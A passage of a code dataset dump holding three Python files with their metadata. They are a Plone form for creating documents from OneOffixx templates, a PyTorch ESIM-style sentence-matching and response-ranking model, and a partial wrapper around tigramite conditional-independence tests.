self.template_id == other.template_id\n return False\n\n\nclass MutableObjectVocabulary(SimpleVocabulary):\n\n def __contains__(self, value):\n try:\n return any([value == val for val in self.by_value])\n except TypeError:\n return False\n\n\nclass ICreateDocumentFromOneOffixxTemplate(model.Schema):\n\n # XXX - this always renders the --NOVALUE-- as the actually chosen\n # default is actually loaded over AJAX - confusing and bad UX\n template_group = schema.Choice(\n title=_(u'label_template_group', default=u'Template group'),\n source=list_template_groups,\n required=False,\n defaultFactory=default_template_group,\n )\n\n template = TableChoice(\n title=_(u\"label_template\", default=u\"Template\"),\n source=list_templates,\n required=True,\n show_filter=True,\n vocabulary_depends_on=['form.widgets.template_group'],\n columns=(\n {'column': 'title',\n 'column_title': _(u'label_title', default=u'Title'),\n 'sort_index': 'sortable_title'},\n )\n )\n\n title = schema.TextLine(\n title=_(u\"label_title\", default=u\"Title\"),\n required=True)\n\n\nclass SelectOneOffixxTemplateDocumentWizardStep(Form):\n\n label = _(u'create_document_with_template', default=u'Create document from template')\n ignoreContext = True\n fields = Fields(ICreateDocumentFromOneOffixxTemplate)\n\n def updateWidgets(self, prefix=None):\n super(SelectOneOffixxTemplateDocumentWizardStep, self).updateWidgets(prefix=prefix)\n self.widgets['template_group'].noValueMessage = translate(\n _(u'label_all_template_groups', default=u'All templates'), context=self.request)\n\n def finish_document_creation(self, data):\n new_doc = self.create_document(data)\n self.activate_external_editing(new_doc)\n return self.request.RESPONSE.redirect(new_doc.absolute_url())\n\n def activate_external_editing(self, new_doc):\n \"\"\"Add the oneoffixx external_editor URL to redirector queue.\"\"\"\n new_doc.setup_external_edit_redirect(self.request, action=\"oneoffixx\")\n\n def create_document(self, data):\n \"\"\"Create a new document based on a template.\"\"\"\n command = CreateDocumentFromOneOffixxTemplateCommand(self.context, data['title'], data['template'])\n return command.execute()\n\n @button.buttonAndHandler(_('button_save', default=u'Save'), name='save')\n def handleApply(self, action):\n data, errors = self.extractData()\n\n if not errors:\n return self.finish_document_creation(data)\n\n self.status = self.formErrorsMessage\n return None\n\n @button.buttonAndHandler(_(u'button_cancel', default=u'Cancel'), name='cancel')\n def cancel(self, action):\n return self.request.RESPONSE.redirect(self.context.absolute_url())\n\n\nclass SelectOneOffixxTemplateDocumentView(FormWrapper):\n\n form = SelectOneOffixxTemplateDocumentWizardStep\n", "sub_path": "opengever/oneoffixx/browser/form.py", "file_name": "form.py", "file_ext": "py", "file_size_in_byte": 7651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 23, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 35, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 37, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 49, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 54, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 74, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 74, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 83, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 83, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 66, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 66, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 103, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 103, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 97, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 97, "usage_type": "argument"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 117, "usage_type": "name"}, {"api_name": "zope.component.getUtility", "line_number": 120, "usage_type": "call"}, {"api_name": "plone.i18n.normalizer.interfaces.IFileNameNormalizer", "line_number": 120, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 130, "usage_type": "name"}, {"api_name": "plone.supermodel.model.Schema", "line_number": 139, "usage_type": "attribute"}, {"api_name": "plone.supermodel.model", "line_number": 139, "usage_type": "name"}, {"api_name": "zope.schema.Choice", "line_number": 143, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 143, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 144, "usage_type": "call"}, {"api_name": "opengever.base.schema.TableChoice", "line_number": 150, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 151, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 158, "usage_type": "call"}, {"api_name": "zope.schema.TextLine", "line_number": 163, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 163, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 164, "usage_type": "call"}, {"api_name": "z3c.form.form.Form", "line_number": 168, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 170, "usage_type": "call"}, {"api_name": "z3c.form.field.Fields", "line_number": 172, "usage_type": "call"}, {"api_name": "zope.i18n.translate", "line_number": 176, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 177, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.command.CreateDocumentFromOneOffixxTemplateCommand", "line_number": 190, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 193, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 203, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 203, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 203, "usage_type": "call"}, {"api_name": "plone.z3cform.layout.FormWrapper", "line_number": 208, "usage_type": "name"}]}
+{"seq_id": "125428796", "text": "import pdb\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nsys.path.append(\"..\")\nfrom utils.misc import ixvr\n\nclass AttendFeedForward(nn.Module):\n\t\"\"\"\n\tSimiliar to the attend (Section 3.1) module of the DecAtt paper\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(AttendFeedForward, self).__init__()\n\n\t\tself.hidden_size = hidden_size\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\talphas: Soft aligned combinations of s1 w.r.t. s2 tokens (b x maxlen x inp_size)\n\t\t\tbetas: Soft aligned combinations of s2 w.r.t. s1 tokens (b x maxlen x inp_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\th1 = self.linear(s1.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\th2 = self.linear(s2.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\th2t = torch.transpose(h2, 1, 2)\n\t\t# b x hidden_size x LB\n\n\t\te = torch.bmm(h1, h2t)\n\n\t\te_alpha = torch.mul(e, mask1.unsqueeze(-1))\n\t\te_alpha = torch.exp(e_alpha - torch.max(e_alpha, dim=1)[0].unsqueeze(1))\n\t\te_alpha = torch.div(e_alpha, torch.sum(e_alpha, dim=1).unsqueeze(1))\n\t\t# b x LA x LB\n\n\t\te_beta = torch.mul(e, mask2.unsqueeze(1))\n\t\te_beta = torch.exp(e_beta - torch.max(e_beta, dim=2)[0].unsqueeze(-1))\n\t\te_beta = torch.div(e_beta, torch.sum(e_beta, dim=2).unsqueeze(-1))\n\t\t# b x LA x LB\n\n\t\talphas = torch.bmm(torch.transpose(e_alpha, 1, 2), s1)\n\t\talphas = torch.mul(alphas, mask2.unsqueeze(-1))\n\t\t# b x LB x inp_size\n\t\tbetas = torch.bmm(e_beta, s2)\n\t\tbetas = torch.mul(betas, mask1.unsqueeze(-1))\n\t\t# b x LA x inp_size\n\n\t\treturn alphas, betas\n\nclass CompareFeedForward(nn.Module):\n\t\"\"\"\n\tSimilar to the compare (Section 3.2) module of the DecAtt paper\n\texcept instead of returning the sum of the embeddings v1 and v2\n\t(which might be susceptible to the length of the sequence),\n\tthis returns v1_avg, v1_max, v2_avg, v2_max.\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(CompareFeedForward, self).__init__()\n\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size * 2, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, alphas, betas, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\talphas: Aligned phrases (b x LB x inp_size)\n\t\t\tbetas: Aligned phrases (b x LA x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\tv1_avg: Comparison avg. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv1_max: Comparison max. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv2_avg: Comparison avg. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\tv2_max: Comparison max. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\tin1 = torch.cat((s1, betas), dim=2)\n\t\t# b x LA x (inp_size * 2)\n\t\tin2 = torch.cat((s2, alphas), dim=2)\n\t\t# b x LB x (inp_size * 2)\n\n\t\tv1 = self.linear(in1.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\tv1_avg = torch.sum(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)\n\t\tv1_avg = torch.div(v1_avg, torch.sum(mask1, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv1_max = torch.max(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\tv2 = self.linear(in2.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\tv2_avg = torch.sum(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)\n\t\tv2_avg = torch.div(v2_avg, torch.sum(mask2, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv2_max = torch.max(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\treturn v1_avg, v1_max, v2_avg, v2_max\n\nclass ESIMBNMultiTask(nn.Module):\n\t\"\"\"\n\tModel architecture similar to the Enhanced Sequential Inference Model (ESIM)\n\tas described in https://arxiv.org/abs/1609.06038 without the Tree LSTM. This\n\tmodel also has BatchNorm layers for preventing overfitting instead of dropout\n\tlayers.\n\n\tThe BatchNorm order followed here is LIN -> ReLU -> BN even though the original\n\tpaper used BN before the non-linearity. Some online sources claim that BN after\n\tthe ReLU gives better results.\n\n\tThe model is designed for both Reddit response prediction task and Quora\n\tsemantic question matching task.\n\t\"\"\"\n\tdef __init__(self, hidden_size=200, glove_loader=None, pretrained_emb=True):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\thidden_size: Size of the intermediate linear layers\n\t\t\tglove_loader: GLoVe embedding loader\n\t\t\tpretrained_emb: Use pretrained embeddings\n\t\t\"\"\"\n\t\tsuper(ESIMBNMultiTask, self).__init__()\n\n\t\tif not pretrained_emb:\n\t\t\traise NotImplementedError('always loads pretrained embeddings')\n\n\t\tword_vectors = glove_loader.word_vectors\n\t\tword_vectors = np.vstack(word_vectors)\n\t\tvocab_size = word_vectors.shape[0]\n\t\tembed_size = word_vectors.shape[1]\n\n\t\tself.embedding = nn.Embedding(vocab_size, embed_size)\n\t\tself.embedding.load_state_dict({'weight': torch.Tensor(word_vectors)})\n\t\tself.encoder = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=1, bidirectional=True)\n\t\tself.attend = AttendFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\t\tself.compare = CompareFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\n\t\t# prediction layer for the Quora task\n\t\tself.sts_pred = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 4, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, 2))\n\n\t\t# tranformation layer for the response\n\t\tself.response_transform = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2), \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2))\n\n\t\tself.reset_parameters()\n\n\tdef reset_parameters(self):\n\t\t\"\"\"Initialize network weights using Xavier init (with bias 0.01)\"\"\"\n\t\tself.apply(ixvr)\n\n\tdef forward(self, s1, s2, len1, len2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 embeddings (b x LA)\n\t\t\ts2: Sentence 2 embeddings (b x LB)\n\t\t\tlen1: Sentence 1 length (b)\n\t\t\tlen2: Sentence 2 length (b)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\n\t\ts1 = self.embedding(s1).transpose(0, 1)\n\t\ts1, _ = self.encoder(s1)\n\t\ts1 = torch.transpose(s1, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\ts2 = self.embedding(s2).transpose(0, 1)\n\t\ts2, _ = self.encoder(s2)\n\t\ts2 = torch.transpose(s2, 0, 1).contiguous()\n\t\t# b x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len1.unsqueeze(-1)\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len2.unsqueeze(-1)\n\n\t\tmask1 = mask1.float()\n\t\tmask2 = mask2.float()\n\n\t\talphas, betas = self.attend(s1, s2, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(s1, s2, alphas, betas, mask1, mask2)\n\t\tassert batch_size > 1\n\t\tout = self.sts_pred(torch.cat((v1_avg, v1_max, v2_avg, v2_max), dim=1))\n\n\t\treturn out\n\n\tdef rank_responses(self, q, resp, len_q, len_resp):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tq: Reddit question embeddings (b x LA)\n\t\t\tresp: Reddit response candidates embeddings (b x K x LB)\n\t\t\tlen_q: Length of the input question (b)\n\t\t\tlen_resp: Length of the response candidates (b x K)\n\t\t\"\"\"\n\n\t\tbatch_size = q.shape[0]\n\t\tmaxlen = q.shape[1]\n\t\tK = resp.shape[1]\n\n\t\tq = self.embedding(q).transpose(0, 1)\n\t\tq, _ = self.encoder(q)\n\t\tq = torch.transpose(q, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\tresp = self.embedding(resp).view(batch_size * K, maxlen, -1).transpose(0, 1)\n\t\tresp, _ = self.encoder(resp)\n\t\tresp = torch.transpose(resp, 0, 1).view(batch_size, K, maxlen, -1).contiguous()\n\t\t# b x K x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len_q.unsqueeze(-1)\n\t\tmask1 = mask1.float()\n\t\t# b x LA\n\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size * K, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len_resp.view(-1).unsqueeze(-1)\n\t\tmask2 = mask2.view(batch_size, K, -1).float()\n\t\t# b x K x LB\n\n\t\tq = q.unsqueeze(1).expand(-1, K, -1, -1).contiguous().view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LA x (hidden_size * 2)\n\t\tmask1 = mask1.unsqueeze(1).expand(-1, K, -1).contiguous().view(batch_size * K, maxlen)\n\t\t# (b * K) x LA\n\n\t\tresp = resp.view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LB x (hidden_size * 2)\n\t\tmask2 = mask2.view(batch_size * K, maxlen)\n\t\t# (b * K) x LB\n\n\t\talphas, betas = self.attend(q, resp, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(q, resp, alphas, betas, mask1, mask2)\n\n\t\tv1 = torch.cat((v1_avg, v1_max), dim=1)\n\t\t# (b * K) x (hidden_size * 2)\n\t\tv2 = self.response_transform(torch.cat((v2_avg, v2_max), dim=1))\n\t\t# (b * K) x (hidden_size * 2)\n\n\t\tscores = torch.sum(torch.mul(v1, v2), dim=1).view(batch_size, -1)\n\t\t# b x K\n\n\t\treturn scores\n", "sub_path": "models/ESIMBNMultiTask.py", "file_name": "ESIMBNMultiTask.py", "file_ext": "py", "file_size_in_byte": 9601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.LSTM", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "utils.misc.ixvr", "line_number": 186, "usage_type": "argument"}, {"api_name": "torch.transpose", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 250, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 257, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 281, "usage_type": "call"}]}
+{"seq_id": "11376249", "text": "import random\nimport torch\nimport torch.nn as nn\nfrom torch import optim\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nimport time\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests import CMIknn, ParCorr\n\n\nimport itertools\nfrom joblib import Parallel, delayed\n\n# from ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha, window_size, align_pair\n# from ctmi_new import i_ctmi, ctmi\n# from gctmi import gctmi\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi_new import ctmi, align_matrix, tmi, gamma_matrix_window_matrix, get_alpha\n# from gctmi import gctmi\n\nfrom datetime import datetime\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n\nclass TestMI:\n def __init__(self, p_value= True):\n self.cd = CMIknn(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, knn=10, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n self.p_value = p_value\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n\n ws_xy = 1\n # y_past = y[:-ws_xy]\n # x = x[ws_xy:]#.reset_index(drop=True)\n # y = y[ws_xy:]#.reset_index(drop=True)\n\n if z is not None:\n # z = z[ws_xy:] # .reset_index(drop=True)\n # z = np.concatenate((z, y_past), axis=1)\n\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n # X = np.concatenate((x, y, y_past), axis=1)\n X = np.concatenate((x, y), axis=1)\n # xyz = np.array([0] * dim_x + [1] * dim_y + [2] * ws_xy)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n if self.p_value:\n pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n return pvalue, value\n else:\n return 0, value\n\n\nclass TestParCorr:\n def __init__(self):\n self.cd = ParCorr(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n if z is not None:\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n X = np.concatenate((x, y), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n # 